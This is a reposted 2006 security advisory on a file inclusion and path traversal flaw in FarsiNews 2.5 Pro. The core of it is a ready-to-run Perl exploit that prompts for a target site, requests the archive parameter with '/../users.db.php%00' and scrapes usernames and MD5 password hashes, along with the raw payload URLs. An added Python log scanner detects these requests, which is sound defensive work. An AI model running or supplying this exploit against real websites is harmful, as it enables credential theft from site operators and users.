FarsiNews Remote File Inclusion
[Author: anonymous    Reposted from: Internet    Updated: 2006-3-25    Entered by: 一生情长]

Summary
"FarsiNews is a News Publishing System"

Improper handling of user input allows attackers to include arbitrary files.
 
Credit:
The information has been provided by hessamx. 
 
Details
Vulnerable Systems:
 * FarsiNews version 2.5 Pro and prior

Exploit:
#!/usr/bin/perl
# << HESSAM-X >>
# FarsiNews 2.5Pro Exploit
# Exploit by Hessam-x (www.hessamx.net)
#Iran Hackerz Security Team
#WebSite: www.hackerz.ir
#
# Summary
# Name : FarsiNews [www.farsinewsteam.com]
# version : 2.5Pro
######################################################
# in FarsiNews if you change the archive value :
# http://localhost/index.php?archive=hamid
# see :
# Warning: file([PATH]/data/archives/hamid.news.arch.php):
# failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 642
# Warning: file([PATH]/data/archives/hamid.comments.arch.php):
# failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 686
# ...[and many other errors]
# This means that shows.inc.php tries to open '/archives/hamid.news.arch.php' (and also 'hamid.comments.arch.php') to read its data.
# We can change the archive value to '/../users.db.php%00' to see all usernames and passwords.
# Exploit :
# http://localhost/index.php?archive=/../users.db.php%00
# http://localhost/Farsi1/index.php?archive=/../[file-to-read]%00
# F0und by hamid
use LWP::Simple;

print "-------------------------------------------\n";
print "= Farsinews 2.5Pro =\n";
print "= By Hessam-x - www.hackerz.ir =\n";
print "-------------------------------------------\n\n";

       
        print "Target(www.example.com)\> ";
        chomp($targ = <STDIN>);
       
        print "Path: (/fn25/)\>";
        chomp($path=<STDIN>);
       
$url = "index.php?archive=/../users.db.php%00";
$page = get("http://".$targ.$path.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $targ\n";

$page =~ m/<img alt="(.*?)" src=/ && print "[+] Username: $1\n";
$page =~ m/style="border: none;" align="right" \/>(.*?)<\/font>/ && print "[+] MD5 Password: $1\n";

print "[-] Unable to retrieve User ID\n" if(!$1);
#EoF
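
A defender-side check for the request pattern described in the script's comments, as an added example that is not part of the original advisory: it scans web access logs for archive values that, after URL decoding, contain a traversal sequence, a path separator or a NUL byte. The log lines, the numeric archive value and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed sample access-log lines (not real traffic); values are assumptions.
SAMPLE_LOG = """\
192.0.2.10 - - [25/Mar/2006:10:00:01 +0000] "GET /fn25/index.php?archive=1143200000 HTTP/1.1" 200 5120
192.0.2.44 - - [25/Mar/2006:10:00:07 +0000] "GET /fn25/index.php?archive=/../users.db.php%00 HTTP/1.1" 200 812
192.0.2.44 - - [25/Mar/2006:10:00:09 +0000] "GET /fn25/index.php?id=3&archive=..%2Fusers.db.php%00 HTTP/1.1" 200 812
192.0.2.51 - - [25/Mar/2006:10:01:30 +0000] "GET /fn25/index.php?id=7 HTTP/1.1" 200 940
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Byte patterns that have no place in an archive identifier.
CHECKS = [
    ("traversal", re.compile(rb"\.\.")),
    ("path-separator", re.compile(rb"[/\\]")),
    ("nul-byte", re.compile(rb"\x00")),
]

def decode_repeatedly(value, rounds=3):
    """Percent-decode until stable so nested encodings are normalised."""
    data = value.encode("utf-8")
    for _ in range(rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def archive_findings(log_text):
    """Return (line number, client address, reasons) for suspicious requests."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        for pair in urlsplit(match.group(1)).query.split("&"):
            name, _, raw = pair.partition("=")
            if unquote_to_bytes(name) != b"archive":
                continue
            value = decode_repeatedly(raw)
            reasons = [label for label, pattern in CHECKS if pattern.search(value)]
            if reasons:
                findings.append((lineno, line.split()[0], reasons))
    return findings

if __name__ == "__main__":
    for finding in archive_findings(SAMPLE_LOG):
        print(finding)
```

A hit that was answered with status 200 and a small response body is worth correlating with the PHP error log, since the warnings quoted in the comments disclose the installation path.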
 
